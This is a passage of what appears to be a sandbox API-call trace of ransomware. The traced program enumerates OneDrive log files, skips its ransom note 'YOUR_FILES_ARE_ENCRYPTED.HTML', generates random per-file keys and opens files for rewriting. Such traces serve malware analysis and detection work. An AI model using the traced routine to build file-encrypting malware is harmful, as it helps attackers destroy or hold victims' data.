param_2="%02X" | out: param_1="79") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="18") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="29") returned 2 [0114.144] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="FC") returned 2 [0114.144] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="DD") returned 2 [0114.144] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="91") returned 2 [0114.144] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="CA") returned 2 [0114.144] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="13") returned 2 [0114.145] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log" [0114.145] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.145] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0114.145] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd27489e1, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd27489e1, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x8afcf13b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x5c1cc, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install-PerUser_2021-02-11_134548_958-b14.log", cAlternateFileName="IN9042~1.LOG")) returned 1 [0114.145] StrStrIW (lpFirst="Install-PerUser_2021-02-11_134548_958-b14.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.145] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log") returned 115 [0114.145] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_134548_958-b14.log") returned=".log" [0114.145] lstrlenW (lpString=".log") returned 4 [0114.145] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_134548_958-b14.log") returned=".log" [0114.145] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install-peruser_2021-02-11_134548_958-b14.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0114.145] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=377292) returned 1 [0114.146] GetProcessHeap () returned 0x600000 [0114.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0114.148] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="D8") returned 2 [0114.148] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="AB") returned 2 [0114.148] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="C8") returned 2 [0114.148] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="A3") returned 2 [0114.148] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="2E") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="4E") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="79") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="1A") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="CB") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="A8") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="C6") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="76") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="99") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="AC") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="EA") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="2C") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="93") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="29") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="11") returned 2 [0114.148] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="3C") returned 2 [0114.148] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="16") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="47") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="CF") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="FA") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="F9") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="A3") returned 2 [0114.148] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="6D") returned 2 [0114.148] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="BA") returned 2 [0114.148] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="0D") returned 2 [0114.148] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="87") returned 2 [0114.148] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="D2") returned 2 [0114.148] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="21") returned 2 [0114.149] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log" [0114.149] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.149] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0114.149] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b49234, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xf5f6, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_125336_460-898.log", cAlternateFileName="INSTAL~1.LOG")) returned 1 [0114.149] StrStrIW (lpFirst="Install_2021-02-11_125336_460-898.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.149] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log") returned 107 [0114.149] PathFindExtensionW (pszPath="Install_2021-02-11_125336_460-898.log") returned=".log" [0114.149] lstrlenW (lpString=".log") returned 4 [0114.149] PathFindExtensionW (pszPath="Install_2021-02-11_125336_460-898.log") returned=".log" [0114.149] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install_2021-02-11_125336_460-898.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0114.150] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=62966) returned 1 [0114.150] GetProcessHeap () returned 0x600000 [0114.150] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3318450 [0114.152] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="D6") returned 2 [0114.152] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="0D") returned 2 [0114.152] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="A2") returned 2 [0114.152] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="6D") returned 2 [0114.152] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1B") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="1A") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="06") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="60") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="21") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="BB") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="C0") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="2B") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="EA") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="93") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="29") returned 2 [0114.152] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="FE") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3C") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="A9") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="9D") returned 2 [0114.188] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="54") returned 2 [0114.188] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="5F") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="B1") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="23") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="60") returned 2 [0114.188] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="AE") returned 2 [0114.189] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="37") returned 2 [0114.189] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="7C") returned 2 [0114.189] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="86") returned 2 [0114.189] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="1D") returned 2 [0114.189] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="9F") returned 2 [0114.189] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="EB") returned 2 [0114.189] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="08") returned 2 [0114.189] lstrcpyW (in: lpString1=0x3328504, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log" [0114.189] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x3318450, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.189] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3318450, lpOverlapped=0x3318450) returned 1 [0114.197] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13219ec0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13219ec0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ae607dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf5f6, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_131858_ed0-ed4.log", cAlternateFileName="INSTAL~3.LOG")) returned 1 [0114.197] StrStrIW (lpFirst="Install_2021-02-11_131858_ed0-ed4.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.197] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log") returned 107 [0114.197] PathFindExtensionW (pszPath="Install_2021-02-11_131858_ed0-ed4.log") returned=".log" [0114.198] lstrlenW (lpString=".log") returned 4 [0114.198] PathFindExtensionW (pszPath="Install_2021-02-11_131858_ed0-ed4.log") returned=".log" [0114.198] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install_2021-02-11_131858_ed0-ed4.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0114.198] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=62966) returned 1 [0114.198] GetProcessHeap () returned 0x600000 [0114.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.200] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="FF") returned 2 [0114.200] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="B2") returned 2 [0114.200] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="A0") returned 2 [0114.200] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="BC") returned 2 [0114.200] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="35") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="37") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="94") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="7D") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="0C") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="94") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="09") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="76") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="E5") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="E4") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="12") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="A5") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="DF") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="C1") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="C5") returned 2 [0114.201] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="E4") returned 2 [0114.201] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="E3") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="D2") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="BE") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="BE") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="41") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="7F") returned 2 [0114.201] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="D3") returned 2 [0114.201] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="F0") returned 2 [0114.201] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="73") returned 2 [0114.201] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="7A") returned 2 [0114.201] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="D5") returned 2 [0114.201] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="3D") returned 2 [0114.202] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log" [0114.202] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.202] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.206] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce65674c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xce65674c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xed3dd471, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf5f6, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_132412_e10-e14.log", cAlternateFileName="IN9930~1.LOG")) returned 1 [0114.206] StrStrIW (lpFirst="Install_2021-02-11_132412_e10-e14.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.206] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log") returned 107 [0114.206] PathFindExtensionW (pszPath="Install_2021-02-11_132412_e10-e14.log") returned=".log" [0114.206] lstrlenW (lpString=".log") returned 4 [0114.206] PathFindExtensionW (pszPath="Install_2021-02-11_132412_e10-e14.log") returned=".log" [0114.206] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install_2021-02-11_132412_e10-e14.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0114.207] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=62966) returned 1 [0114.207] GetProcessHeap () returned 0x600000 [0114.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.209] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="04") returned 2 [0114.209] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="DC") returned 2 [0114.209] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="10") returned 2 [0114.209] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="3F") returned 2 [0114.209] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="72") returned 2 [0114.209] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="ED") returned 2 [0114.209] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="21") returned 2 [0114.209] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="02") returned 2 [0114.209] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="BB") returned 2 [0114.209] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="6F") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="B7") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="83") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="3B") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="31") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E4") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="11") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="79") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="0F") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="FC") returned 2 [0114.210] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="25") returned 2 [0114.210] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="C7") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="61") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="8D") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="03") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="66") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="A2") returned 2 [0114.210] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="18") returned 2 [0114.210] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="28") returned 2 [0114.210] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2B") returned 2 [0114.210] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="E8") returned 2 [0114.210] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F1") returned 2 [0114.210] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="32") returned 2 [0114.210] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log" [0114.211] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.211] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.214] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b7b80c2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4b7b80c2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f5db470, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xf5f6, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_132742_c8c-c90.log", cAlternateFileName="IN7F4F~1.LOG")) returned 1 [0114.214] StrStrIW (lpFirst="Install_2021-02-11_132742_c8c-c90.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.214] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log") returned 107 [0114.214] PathFindExtensionW (pszPath="Install_2021-02-11_132742_c8c-c90.log") returned=".log" [0114.214] lstrlenW (lpString=".log") returned 4 [0114.214] PathFindExtensionW (pszPath="Install_2021-02-11_132742_c8c-c90.log") returned=".log" [0114.214] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install_2021-02-11_132742_c8c-c90.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0114.214] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=62966) returned 1 [0114.214] GetProcessHeap () returned 0x600000 [0114.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.215] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="48") returned 2 [0114.215] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="6F") returned 2 [0114.215] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="02") returned 2 [0114.215] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="AE") returned 2 [0114.215] wsprintfW (in: 